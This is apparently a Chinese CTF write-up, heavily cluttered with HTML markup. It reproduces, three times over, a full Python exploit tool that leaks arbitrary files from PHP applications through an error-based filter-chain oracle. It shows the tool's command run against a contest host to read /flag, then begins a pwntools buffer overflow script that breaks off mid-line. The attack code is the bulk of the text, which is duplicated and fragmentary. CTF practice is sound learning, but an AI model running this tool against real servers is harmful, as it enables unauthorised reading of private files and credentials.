leaf=""><br></span><span leaf=""> parser.add_argument("--match", help="Match a pattern in the response as </span><span leaf=""><br></span><span leaf="">the oracle (--match='</span></span><span leaf="">Allowed memory size of</span><span style="color: #98c379;line-height: 26px;"><span leaf="">')", required=False)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--offset", help="Offset from which a char should be </span><span leaf=""><br></span><span leaf="">leaked (--offset=100)", required=False, type=int)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--log", help="Path to log file (--</span><span leaf=""><br></span><span leaf="">log=/tmp/output.log)", required=False)</span><span leaf=""><br></span><span leaf=""> args = parser.parse_args()</span><span leaf=""><br></span><span leaf=""> # Time based attack management</span><span leaf=""><br></span><span leaf=""> if args.time_based_attack:</span><span leaf=""><br></span><span leaf=""> time_based_attack=args.time_based_attack</span><span leaf=""><br></span><span leaf=""> else:</span><span leaf=""><br></span><span leaf=""> time_based_attack=False</span><span leaf=""><br></span><span leaf=""> # Delay management</span><span leaf=""><br></span><span leaf=""> if args.delay:</span><span leaf=""><br></span><span leaf=""> delay = args.delay</span><span leaf=""><br></span><span leaf=""> else:</span><span leaf=""><br></span><span leaf=""> delay = 0.0</span><span leaf=""><br></span><span leaf=""> # Data management</span><span leaf=""><br></span><span leaf=""> if args.data:</span><span leaf=""><br></span><span leaf=""> try:</span><span leaf=""><br></span><span leaf=""> json.loads(args.data)</span><span leaf=""><br></span><span leaf=""> except ValueError as err:</span><span leaf=""><br></span><span leaf=""> print("[-] data JSON could not be loaded, please make it valid")</span><span leaf=""><br></span><span leaf=""> exit()</span><span leaf=""><br></span><span leaf=""> data=args.data</span><span leaf=""><br></span><span leaf=""> else:</span><span leaf=""><br></span><span leaf=""> data="{}"</span><span leaf=""><br></span><span leaf=""> # Headers management</span><span leaf=""><br></span><span leaf=""> if args.headers:</span><span leaf=""><br></span><span leaf=""> try:</span><span leaf=""><br></span><span leaf=""> json.loads(args.headers)</span><span leaf=""><br></span><span leaf=""> except ValueError as err:</span><span leaf=""><br></span><span leaf=""> print("[-] headers JSON could not be loaded, please make it valid")</span><span leaf=""><br></span><span leaf=""> exit()</span><span leaf=""><br></span><span leaf=""> headers=args.headers</span><span leaf=""><br></span><span leaf=""> else:</span><span leaf=""><br></span><span leaf=""> headers="{}"</span><span leaf=""><br></span><span leaf=""> # Verb management</span><span leaf=""><br></span><span leaf=""> if args.verb:</span><span leaf=""><br></span><span leaf=""> try:</span><span leaf=""><br></span><span leaf=""> verb = Verb[args.verb]</span><span leaf=""><br></span><span leaf=""> except KeyError:</span><span leaf=""><br></span><span leaf=""> verb = Verb.POST</span><span leaf=""><br></span><span leaf=""> else:</span><span leaf=""><br></span><span leaf=""> verb = Verb.POST</span><span leaf=""><br></span><span leaf=""> if args.in_chain:</span><span leaf=""><br></span><span leaf=""> in_chain = args.in_chain</span><span leaf=""><br></span><span leaf=""> else:</span><span leaf=""><br></span><span leaf=""> in_chain = ""</span><span leaf=""><br></span><span leaf=""> # Delay management</span><span leaf=""><br></span><span leaf=""> json_input = False</span><span leaf=""><br></span><span leaf=""> if args.json:</span><span leaf=""><br></span><span leaf=""> json_input = True</span><span leaf=""><br></span><span leaf=""><br></span><span leaf=""> # Match pattern</span><span leaf=""><br></span><span leaf=""> match = False</span><span leaf=""><br></span><span leaf=""> if args.match:</span><span leaf=""><br></span><span leaf=""> match = args.match</span><span leaf=""><br></span><span leaf=""><br></span><span leaf=""> # Offset from which a char should be leaked</span><span leaf=""><br></span><span leaf=""> offset = 0</span><span leaf=""><br></span><span leaf=""> if args.offset:</span><span leaf=""><br></span><span leaf=""> offset = args.offset</span><span leaf=""><br></span><span leaf=""><br></span><span leaf=""> # Log file path</span><span leaf=""><br></span><span leaf=""> self.log_file = False</span><span leaf=""><br></span><span leaf=""> if args.log:</span><span leaf=""><br></span><span leaf=""> self.log_file = args.log</span><span leaf=""><br></span><span leaf=""><br></span><span leaf=""> # Attack launcher</span><span leaf=""><br></span><span leaf=""> self.requestor = Requestor(args.file, args.target, args.parameter, data, </span><span leaf=""><br></span><span leaf="">headers, verb, in_chain, args.proxy, time_based_attack, delay, json_input, match)</span><span leaf=""><br></span><span leaf=""> self.bruteforcer = RequestorBruteforcer(self.requestor, offset)</span><span leaf=""><br></span><span leaf=""> signal.signal(signal.SIGINT, self.signal_handler)</span><span leaf=""><br></span><span leaf=""> # Auto fallback to time based attack</span><span leaf=""><br></span><span leaf=""> self.bruteforcer.bruteforce()</span><span leaf=""><br></span><span leaf=""> # Result parsing</span><span leaf=""><br></span><span leaf=""> if self.bruteforcer.base64:</span><span leaf=""><br></span><span leaf=""> print("[+] File {} leak is finished!".format(self.requestor.file_to_leak))</span><span leaf=""><br></span><span leaf=""> print(self.bruteforcer.base64)</span><span leaf=""><br></span><span leaf=""> print(self.bruteforcer.data)</span><span leaf=""><br></span><span leaf=""> if self.log_file:</span><span leaf=""><br></span><span leaf=""> self.log_in_file("# The following data was leaked from {} from the </span><span leaf=""><br></span><span leaf="">file {}n{}n".format(self.requestor.target, self.requestor.file_to_leak, </span><span leaf=""><br></span><span leaf="">self.bruteforcer.data.decode("utf-8")))</span><span leaf=""><br></span><span leaf=""> exit()</span><span leaf=""><br></span><span leaf=""> else:</span><span leaf=""><br></span><span leaf=""> print("[-] File {} is either empty, or the exploit did not </span><span leaf=""><br></span><span leaf="">work :(".format(self.requestor.file_to_leak))</span><span leaf=""><br></span><span leaf=""> time_based_attack = 1</span><span leaf=""><br></span><span leaf=""> print("[*] Auto fallback to time based attack")</span><span leaf=""><br></span><span leaf=""> self.requestor = Requestor(args.file, args.target, args.parameter, data, </span><span leaf=""><br></span><span leaf="">headers, verb, in_chain, args.proxy, time_based_attack, delay, json_input, match)</span><span leaf=""><br></span><span leaf=""> self.bruteforcer = RequestorBruteforcer(self.requestor, offset)</span><span leaf=""><br></span><span leaf=""> self.bruteforcer.bruteforce()</span><span leaf=""><br></span><span leaf=""><br></span><span leaf=""> if verb == Verb.GET:</span><span leaf=""><br></span><span leaf=""> print("[*] You passed your payload on a GET parameter, the leak might </span><span leaf=""><br></span><span leaf="">be partial! (~135 chars max by default)")</span><span leaf=""><br></span><span leaf=""><br></span><span leaf=""> print(self.bruteforcer.base64)</span><span leaf=""><br></span><span leaf=""> print(self.bruteforcer.data)</span><span leaf=""><br></span><span leaf="">if __name__ == "__main__":</span><span leaf=""><br></span><span leaf=""> filters_chain_oracle = FiltersChainOracle()</span><span leaf=""><br></span><span leaf=""> filters_chain_oracle.main()</span><span leaf=""><br></span><span leaf=""> sys.exit(0)</span><span leaf=""><br></span></span>
<span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf="">#!/usr/bin/env python3</span></span><span leaf=""><br></span><span leaf="">import sys</span><span leaf=""><br></span><span leaf="">import signal</span><span leaf=""><br></span><span leaf="">import argparse</span><span leaf=""><br></span><span leaf="">import json</span><span leaf=""><br></span><span leaf="">from filters_chain_oracle.core.requestor import Requestor</span><span leaf=""><br></span><span leaf="">from filters_chain_oracle.core.verb import Verb</span><span leaf=""><br></span><span leaf="">from filters_chain_oracle.core.bruteforcer import RequestorBruteforcer</span><span leaf=""><br></span><span style="color: #98c379;line-height: 26px;"><span leaf="">""</span></span><span style="color: #98c379;line-height: 26px;"><span leaf="">"</span><span leaf=""><br></span><span leaf="">Class FiltersChainOracle, defines all the CLI logic.</span><span leaf=""><br></span><span leaf="">- useful info -</span><span leaf=""><br></span><span leaf="">This tool is based on the following script : </span><span leaf=""><br></span><span leaf="">https://github.com/DownUnderCTF/Challenges_2022_Public/blob/main/web/minimal</span><span leaf=""><br></span><span leaf="">-php/solve/solution.py</span><span leaf=""><br></span><span leaf="">Each step of this trick is detailed in the following blogpost : </span><span leaf=""><br></span><span leaf="">https://www.synacktiv.com/publications/php-filter-chains-file-read-from-errorbased-oracle</span><span leaf=""><br></span><span leaf="">"</span></span><span style="color: #98c379;line-height: 26px;"><span leaf="">""</span></span><span leaf=""><br></span><span leaf="">class FiltersChainOracle():</span><span leaf=""><br></span><span leaf=""> def __init__(self):</span><span leaf=""><br></span><span leaf=""> self.requestor = None</span><span leaf=""><br></span><span leaf=""> self.bruteforcer = None</span><span leaf=""><br></span><span style="color: #98c379;line-height: 26px;"><span leaf="">""</span></span><span style="color: #98c379;line-height: 26px;"><span leaf="">"</span><span leaf=""><br></span><span leaf=""> Function managing interuption</span><span leaf=""><br></span><span leaf=""> "</span></span><span style="color: #98c379;line-height: 26px;"><span leaf="">""</span></span><span leaf=""><br></span><span leaf=""> def signal_handler(self, sig, frame):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"[*] File leak gracefully stopped."</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"[+] File {} was partially leaked"</span></span><span leaf="">.format(self.requestor.file_to_leak))</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(self.bruteforcer.base64)</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(self.bruteforcer.data)</span><span leaf=""><br></span><span style="color: #c678dd;line-height: 26px;"><span leaf="">if</span></span><span leaf=""> self.log_file:</span><span leaf=""><br></span><span leaf=""> self.log_in_file(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"# The following data was leaked from {} from the </span><span leaf=""><br></span><span leaf="">file {}n{}n"</span></span><span leaf="">.format(self.requestor.target, self.requestor.file_to_leak, </span><span leaf=""><br></span><span leaf="">self.bruteforcer.data.decode(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"utf-8"</span></span><span leaf="">)))</span><span leaf=""><br></span><span leaf=""> sys.exit(1)</span><span leaf=""><br></span><span leaf=""><br></span><span style="color: #98c379;line-height: 26px;"><span leaf="">""</span></span><span style="color: #98c379;line-height: 26px;"><span leaf="">"</span><span leaf=""><br></span><span leaf=""> Function managing log file</span><span leaf=""><br></span><span leaf=""> "</span></span><span style="color: #98c379;line-height: 26px;"><span leaf="">""</span></span><span leaf=""><br></span><span leaf=""> def log_in_file(self, content):</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"[*] Info logged in : {}"</span></span><span leaf="">.format(self.log_file))</span><span leaf=""><br></span><span leaf=""> with open(self.log_file, </span><span style="color: #98c379;line-height: 26px;"><span leaf="">"a"</span></span><span leaf="">) as file:</span><span leaf=""><br></span><span leaf=""> file.write(content)</span><span leaf=""><br></span><span leaf=""> file.flush()</span><span leaf=""><br></span><span style="color: #98c379;line-height: 26px;"><span leaf="">""</span></span><span style="color: #98c379;line-height: 26px;"><span leaf="">"</span><span leaf=""><br></span><span leaf=""> Function managing CLI arguments</span><span leaf=""><br></span><span leaf=""> "</span></span><span style="color: #98c379;line-height: 26px;"><span leaf="">""</span></span><span leaf=""><br></span><span leaf=""> def main(self):</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf="">#signal management</span></span><span leaf=""><br></span><span leaf=""> usage = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">""</span></span><span style="color: #98c379;line-height: 26px;"><span leaf="">"</span><span leaf=""><br></span><span leaf=""> Oracle error based file leaker based on PHP filters.</span><span leaf=""><br></span><span leaf=""> Author of the tool : @_remsio_</span><span leaf=""><br></span><span leaf=""> Trick firstly discovered by : @hash_kitten</span><span leaf=""><br></span><span leaf=""> </span><span leaf=""><br></span><span leaf="">~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~</span><span leaf=""><br></span><span leaf=""> $ python3 filters_chain_oracle_exploit.py --target http://127.0.0.1 --file </span><span leaf=""><br></span><span leaf="">'/test' --parameter 0 </span><span leaf=""><br></span><span leaf=""> [*] The following URL is targeted : http://127.0.0.1</span><span leaf=""><br></span><span leaf=""> [*] The following local file is leaked : /test</span><span leaf=""><br></span><span leaf=""> [*] Running POST requests</span><span leaf=""><br></span><span leaf=""> [+] File /test leak is finished!</span><span leaf=""><br></span><span leaf=""> b'SGVsbG8gZnJvbSBTeW5hY2t0aXYncyBibG9ncG9zdCEK'</span><span leaf=""><br></span><span leaf=""> b"</span></span><span leaf="">Hello from Synacktiv</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'s blogpost!\n"</span><span leaf=""><br></span><span leaf=""> """</span><span leaf=""><br></span><span leaf=""> # Parsing command line arguments</span><span leaf=""><br></span><span leaf=""> parser = argparse.ArgumentParser(description=usage, </span><span leaf=""><br></span><span leaf="">formatter_class=argparse.RawTextHelpFormatter)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--target", help="URL on which you want to run the </span><span leaf=""><br></span><span leaf="">exploit.", required=True)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--file", help="Path to the file you want to leak.", </span><span leaf=""><br></span><span leaf="">required=True)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--parameter", help="Parameter to exploit.", </span><span leaf=""><br></span><span leaf="">required=True)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--data", help="Additionnal data that might be </span><span leaf=""><br></span><span leaf="">required. (ex : {"string":"value"})", required=False)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--headers", help="Headers used by the request. (ex : </span><span leaf=""><br></span><span leaf="">{"Authorization":"Bearer [TOKEN]"})", required=False)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--verb", help="HTTP verb to use </span><span leaf=""><br></span><span leaf="">POST(default),GET(~ 135 chars by default),PUT,DELETE", required=False)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--proxy", help="Proxy you would like to use to run </span><span leaf=""><br></span><span leaf="">the exploit. (ex : http://127.0.0.1:8080)", required=False)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--in_chain", help="Useful to bypass weak strpos </span><span leaf=""><br></span><span leaf="">configurations, adds the string in the chain. (ex : KEYWORD)", required=False)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--time_based_attack", help="Exploits the oracle as a </span><span leaf=""><br></span><span leaf="">time base attack, can be improved. (ex : True)", required=False)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--delay", help="Set the delay in second between </span><span leaf=""><br></span><span leaf="">each request. (ex : 1, 0.1)", required=False)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--json", help="Send data as JSON (--json=1)", </span><span leaf=""><br></span><span leaf="">required=False)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--match", help="Match a pattern in the response as </span><span leaf=""><br></span><span leaf="">the oracle (--match='</span></span><span leaf="">Allowed memory size of</span><span style="color: #98c379;line-height: 26px;"><span leaf="">')", required=False)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--offset", help="Offset from which a char should be </span><span leaf=""><br></span><span leaf="">leaked (--offset=100)", required=False, type=int)</span><span leaf=""><br></span><span leaf=""> parser.add_argument("--log", help="Path to log file (--</span><span leaf=""><br></span><span leaf="">log=/tmp/output.log)", required=False)</span><span leaf=""><br></span><span leaf=""> args = parser.parse_args()</span><span leaf=""><br></span><span leaf=""> # Time based attack management</span><span leaf=""><br></span><span leaf=""> if args.time_based_attack:</span><span leaf=""><br></span><span leaf=""> time_based_attack=args.time_based_attack</span><span leaf=""><br></span><span leaf=""> else:</span><span leaf=""><br></span><span leaf=""> time_based_attack=False</span><span leaf=""><br></span><span leaf=""> # Delay management</span><span leaf=""><br></span><span leaf=""> if args.delay:</span><span leaf=""><br></span><span leaf=""> delay = args.delay</span><span leaf=""><br></span><span leaf=""> else:</span><span leaf=""><br></span><span leaf=""> delay = 0.0</span><span leaf=""><br></span><span leaf=""> # Data management</span><span leaf=""><br></span><span leaf=""> if args.data:</span><span leaf=""><br></span><span leaf=""> try:</span><span leaf=""><br></span><span leaf=""> json.loads(args.data)</span><span leaf=""><br></span><span leaf=""> except ValueError as err:</span><span leaf=""><br></span><span leaf=""> print("[-] data JSON could not be loaded, please make it valid")</span><span leaf=""><br></span><span leaf=""> exit()</span><span leaf=""><br></span><span leaf=""> data=args.data</span><span leaf=""><br></span><span leaf=""> else:</span><span leaf=""><br></span><span leaf=""> data="{}"</span><span leaf=""><br></span><span leaf=""> # Headers management</span><span leaf=""><br></span><span leaf=""> if args.headers:</span><span leaf=""><br></span><span leaf=""> try:</span><span leaf=""><br></span><span leaf=""> json.loads(args.headers)</span><span leaf=""><br></span><span leaf=""> except ValueError as err:</span><span leaf=""><br></span><span leaf=""> print("[-] headers JSON could not be loaded, please make it valid")</span><span leaf=""><br></span><span leaf=""> exit()</span><span leaf=""><br></span><span leaf=""> headers=args.headers</span><span leaf=""><br></span><span leaf=""> else:</span><span leaf=""><br></span><span leaf=""> headers="{}"</span><span leaf=""><br></span><span leaf=""> # Verb management</span><span leaf=""><br></span><span leaf=""> if args.verb:</span><span leaf=""><br></span><span leaf=""> try:</span><span leaf=""><br></span><span leaf=""> verb = Verb[args.verb]</span><span leaf=""><br></span><span leaf=""> except KeyError:</span><span leaf=""><br></span><span leaf=""> verb = Verb.POST</span><span leaf=""><br></span><span leaf=""> else:</span><span leaf=""><br></span><span leaf=""> verb = Verb.POST</span><span leaf=""><br></span><span leaf=""> if args.in_chain:</span><span leaf=""><br></span><span leaf=""> in_chain = args.in_chain</span><span leaf=""><br></span><span leaf=""> else:</span><span leaf=""><br></span><span leaf=""> in_chain = ""</span><span leaf=""><br></span><span leaf=""> # Delay management</span><span leaf=""><br></span><span leaf=""> json_input = False</span><span leaf=""><br></span><span leaf=""> if args.json:</span><span leaf=""><br></span><span leaf=""> json_input = True</span><span leaf=""><br></span><span leaf=""><br></span><span leaf=""> # Match pattern</span><span leaf=""><br></span><span leaf=""> match = False</span><span leaf=""><br></span><span leaf=""> if args.match:</span><span leaf=""><br></span><span leaf=""> match = args.match</span><span leaf=""><br></span><span leaf=""><br></span><span leaf=""> # Offset from which a char should be leaked</span><span leaf=""><br></span><span leaf=""> offset = 0</span><span leaf=""><br></span><span leaf=""> if args.offset:</span><span leaf=""><br></span><span leaf=""> offset = args.offset</span><span leaf=""><br></span><span leaf=""><br></span><span leaf=""> # Log file path</span><span leaf=""><br></span><span leaf=""> self.log_file = False</span><span leaf=""><br></span><span leaf=""> if args.log:</span><span leaf=""><br></span><span leaf=""> self.log_file = args.log</span><span leaf=""><br></span><span leaf=""><br></span><span leaf=""> # Attack launcher</span><span leaf=""><br></span><span leaf=""> self.requestor = Requestor(args.file, args.target, args.parameter, data, </span><span leaf=""><br></span><span leaf="">headers, verb, in_chain, args.proxy, time_based_attack, delay, json_input, match)</span><span leaf=""><br></span><span leaf=""> self.bruteforcer = RequestorBruteforcer(self.requestor, offset)</span><span leaf=""><br></span><span leaf=""> signal.signal(signal.SIGINT, self.signal_handler)</span><span leaf=""><br></span><span leaf=""> # Auto fallback to time based attack</span><span leaf=""><br></span><span leaf=""> self.bruteforcer.bruteforce()</span><span leaf=""><br></span><span leaf=""> # Result parsing</span><span leaf=""><br></span><span leaf=""> if self.bruteforcer.base64:</span><span leaf=""><br></span><span leaf=""> print("[+] File {} leak is finished!".format(self.requestor.file_to_leak))</span><span leaf=""><br></span><span leaf=""> print(self.bruteforcer.base64)</span><span leaf=""><br></span><span leaf=""> print(self.bruteforcer.data)</span><span leaf=""><br></span><span leaf=""> if self.log_file:</span><span leaf=""><br></span><span leaf=""> self.log_in_file("# The following data was leaked from {} from the </span><span leaf=""><br></span><span leaf="">file {}n{}n".format(self.requestor.target, self.requestor.file_to_leak, </span><span leaf=""><br></span><span leaf="">self.bruteforcer.data.decode("utf-8")))</span><span leaf=""><br></span><span leaf=""> exit()</span><span leaf=""><br></span><span leaf=""> else:</span><span leaf=""><br></span><span leaf=""> print("[-] File {} is either empty, or the exploit did not </span><span leaf=""><br></span><span leaf="">work :(".format(self.requestor.file_to_leak))</span><span leaf=""><br></span><span leaf=""> time_based_attack = 1</span><span leaf=""><br></span><span leaf=""> print("[*] Auto fallback to time based attack")</span><span leaf=""><br></span><span leaf=""> self.requestor = Requestor(args.file, args.target, args.parameter, data, </span><span leaf=""><br></span><span leaf="">headers, verb, in_chain, args.proxy, time_based_attack, delay, json_input, match)</span><span leaf=""><br></span><span leaf=""> self.bruteforcer = RequestorBruteforcer(self.requestor, offset)</span><span leaf=""><br></span><span leaf=""> self.bruteforcer.bruteforce()</span><span leaf=""><br></span><span leaf=""><br></span><span leaf=""> if verb == Verb.GET:</span><span leaf=""><br></span><span leaf=""> print("[*] You passed your payload on a GET parameter, the leak might </span><span leaf=""><br></span><span leaf="">be partial! (~135 chars max by default)")</span><span leaf=""><br></span><span leaf=""><br></span><span leaf=""> print(self.bruteforcer.base64)</span><span leaf=""><br></span><span leaf=""> print(self.bruteforcer.data)</span><span leaf=""><br></span><span leaf="">if __name__ == "__main__":</span><span leaf=""><br></span><span leaf=""> filters_chain_oracle = FiltersChainOracle()</span><span leaf=""><br></span><span leaf=""> filters_chain_oracle.main()</span><span leaf=""><br></span><span leaf=""> sys.exit(0)</span><span leaf=""><br></span></span>
#!/usr/bin/env python3
import sys
import signal
import argparse
import json
from filters_chain_oracle.core.requestor import Requestor
from filters_chain_oracle.core.verb import Verb
from filters_chain_oracle.core.bruteforcer import RequestorBruteforcer
"""
Class FiltersChainOracle, defines all the CLI logic.
- useful info -
This tool is based on the following script : 
https://github.com/DownUnderCTF/Challenges_2022_Public/blob/main/web/minimal
-php/solve/solution.py
Each step of this trick is detailed in the following blogpost : 
https://www.synacktiv.com/publications/php-filter-chains-file-read-from-errorbased-oracle
"""
class FiltersChainOracle():
 def __init__(self):
 self.requestor = None
 self.bruteforcer = None
"""
 Function managing interuption
 """
 def signal_handler(self, sig, frame):
print("[*] File leak gracefully stopped.")
print("[+] File {} was partially leaked".format(self.requestor.file_to_leak))
print(self.bruteforcer.base64)
print(self.bruteforcer.data)
if self.log_file:
 self.log_in_file("# The following data was leaked from {} from the 
file {}n{}n".format(self.requestor.target, self.requestor.file_to_leak, 
self.bruteforcer.data.decode("utf-8")))
 sys.exit(1)

"""
 Function managing log file
 """
 def log_in_file(self, content):
print("[*] Info logged in : {}".format(self.log_file))
 with open(self.log_file, "a") as file:
 file.write(content)
 file.flush()
"""
 Function managing CLI arguments
 """
 def main(self):
#signal management
 usage = """
 Oracle error based file leaker based on PHP filters.
 Author of the tool : @_remsio_
 Trick firstly discovered by : @hash_kitten
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 $ python3 filters_chain_oracle_exploit.py --target http://127.0.0.1 --file 
'/test' --parameter 0 
 [*] The following URL is targeted : http://127.0.0.1
 [*] The following local file is leaked : /test
 [*] Running POST requests
 [+] File /test leak is finished!
 b'SGVsbG8gZnJvbSBTeW5hY2t0aXYncyBibG9ncG9zdCEK'
 b"Hello from Synacktiv's blogpost!\n"
 """
 # Parsing command line arguments
 parser = argparse.ArgumentParser(description=usage, 
formatter_class=argparse.RawTextHelpFormatter)
 parser.add_argument("--target", help="URL on which you want to run the 
exploit.", required=True)
 parser.add_argument("--file", help="Path to the file you want to leak.", 
required=True)
 parser.add_argument("--parameter", help="Parameter to exploit.", 
required=True)
 parser.add_argument("--data", help="Additionnal data that might be 
required. (ex : {"string":"value"})", required=False)
 parser.add_argument("--headers", help="Headers used by the request. (ex : 
{"Authorization":"Bearer [TOKEN]"})", required=False)
 parser.add_argument("--verb", help="HTTP verb to use 
POST(default),GET(~ 135 chars by default),PUT,DELETE", required=False)
 parser.add_argument("--proxy", help="Proxy you would like to use to run 
the exploit. (ex : http://127.0.0.1:8080)", required=False)
 parser.add_argument("--in_chain", help="Useful to bypass weak strpos 
configurations, adds the string in the chain. (ex : KEYWORD)", required=False)
 parser.add_argument("--time_based_attack", help="Exploits the oracle as a 
time base attack, can be improved. (ex : True)", required=False)
 parser.add_argument("--delay", help="Set the delay in second between 
each request. (ex : 1, 0.1)", required=False)
 parser.add_argument("--json", help="Send data as JSON (--json=1)", 
required=False)
 parser.add_argument("--match", help="Match a pattern in the response as 
the oracle (--match='Allowed memory size of')", required=False)
 parser.add_argument("--offset", help="Offset from which a char should be 
leaked (--offset=100)", required=False, type=int)
 parser.add_argument("--log", help="Path to log file (--
log=/tmp/output.log)", required=False)
 args = parser.parse_args()
 # Time based attack management
 if args.time_based_attack:
 time_based_attack=args.time_based_attack
 else:
 time_based_attack=False
 # Delay management
 if args.delay:
 delay = args.delay
 else:
 delay = 0.0
 # Data management
 if args.data:
 try:
 json.loads(args.data)
 except ValueError as err:
 print("[-] data JSON could not be loaded, please make it valid")
 exit()
 data=args.data
 else:
 data="{}"
 # Headers management
 if args.headers:
 try:
 json.loads(args.headers)
 except ValueError as err:
 print("[-] headers JSON could not be loaded, please make it valid")
 exit()
 headers=args.headers
 else:
 headers="{}"
 # Verb management
 if args.verb:
 try:
 verb = Verb[args.verb]
 except KeyError:
 verb = Verb.POST
 else:
 verb = Verb.POST
 if args.in_chain:
 in_chain = args.in_chain
 else:
 in_chain = ""
 # Delay management
 json_input = False
 if args.json:
 json_input = True

 # Match pattern
 match = False
 if args.match:
 match = args.match

 # Offset from which a char should be leaked
 offset = 0
 if args.offset:
 offset = args.offset

 # Log file path
 self.log_file = False
 if args.log:
 self.log_file = args.log

 # Attack launcher
 self.requestor = Requestor(args.file, args.target, args.parameter, data, 
headers, verb, in_chain, args.proxy, time_based_attack, delay, json_input, match)
 self.bruteforcer = RequestorBruteforcer(self.requestor, offset)
 signal.signal(signal.SIGINT, self.signal_handler)
 # Auto fallback to time based attack
 self.bruteforcer.bruteforce()
 # Result parsing
 if self.bruteforcer.base64:
 print("[+] File {} leak is finished!".format(self.requestor.file_to_leak))
 print(self.bruteforcer.base64)
 print(self.bruteforcer.data)
 if self.log_file:
 self.log_in_file("# The following data was leaked from {} from the 
file {}n{}n".format(self.requestor.target, self.requestor.file_to_leak, 
self.bruteforcer.data.decode("utf-8")))
 exit()
 else:
 print("[-] File {} is either empty, or the exploit did not 
work :(".format(self.requestor.file_to_leak))
 time_based_attack = 1
 print("[*] Auto fallback to time based attack")
 self.requestor = Requestor(args.file, args.target, args.parameter, data, 
headers, verb, in_chain, args.proxy, time_based_attack, delay, json_input, match)
 self.bruteforcer = RequestorBruteforcer(self.requestor, offset)
 self.bruteforcer.bruteforce()

 if verb == Verb.GET:
 print("[*] You passed your payload on a GET parameter, the leak might 
be partial! (~135 chars max by default)")

 print(self.bruteforcer.base64)
 print(self.bruteforcer.data)
if __name__ == "__main__":
 filters_chain_oracle = FiltersChainOracle()
 filters_chain_oracle.main()
 sys.exit(0)

塞进机器后直接

<span leaf="">python filters_chain_oracle_exploit.py --target http://eci2ze0sy1cu9fue3fdepy3.cloudeci1.ichunqiu.com:80 --file </span><span style="color: #98c379;line-height: 26px;"><span leaf="">'/flag'</span></span><span leaf=""> --parameter path</span><span leaf=""><br></span>
<span leaf="">python filters_chain_oracle_exploit.py --target http://eci2ze0sy1cu9fue3fdepy3.cloudeci1.ichunqiu.com:80 --file </span><span style="color: #98c379;line-height: 26px;"><span leaf="">'/flag'</span></span><span leaf=""> --parameter path</span><span leaf=""><br></span>
python filters_chain_oracle_exploit.py --target http://eci2ze0sy1cu9fue3fdepy3.cloudeci1.ichunqiu.com:80 --file '/flag' --parameter path

Gender_Simulation

缓冲区溢出

<span leaf="">from pwn import *</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 加载二进制文件和 libc</span></span><span leaf=""><br></span><span leaf="">binary_path = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">'./pwn'</span></span><span leaf=""><br></span><span leaf="">elf_binary = ELF(binary_path)</span><span leaf=""><br></span><span leaf="">libc_binary = ELF(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'./libc.so.6'</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 设置日志级别、架构和终端</span></span><span leaf=""><br></span><span leaf="">context.log_level = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">'debug'</span></span><span leaf=""><br></span><span leaf="">context.arch = elf_binary.arch</span><span leaf=""><br></span><span leaf="">context.terminal = [</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'tmux'</span></span><span leaf="">, </span><span style="color: #98c379;line-height: 26px;"><span leaf="">'neww'</span></span><span leaf="">]</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义工具函数</span></span><span leaf=""><br></span><span leaf="">send_data = lambda data: io.send(data) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 发送数据</span></span><span leaf=""><br></span><span leaf="">send_after_delim = lambda delim, data: io.sendafter(delim, data) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 在接收到 delim </span></span><span leaf=""><br></span><span leaf="">后发送数据</span><span leaf=""><br></span><span leaf="">send_line_data = lambda data: io.sendline(data) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 发送一行数据</span></span><span leaf=""><br></span><span leaf="">send_line_after_delim = lambda delim, data: io.sendlineafter(delim, data) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 在接收</span></span><span leaf=""><br></span><span leaf="">到 delim 后发送一行数据</span><span leaf=""><br></span><span leaf="">receive_data = lambda num_bytes=4096: io.recv(num_bytes) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 接收指定字节数的</span></span><span 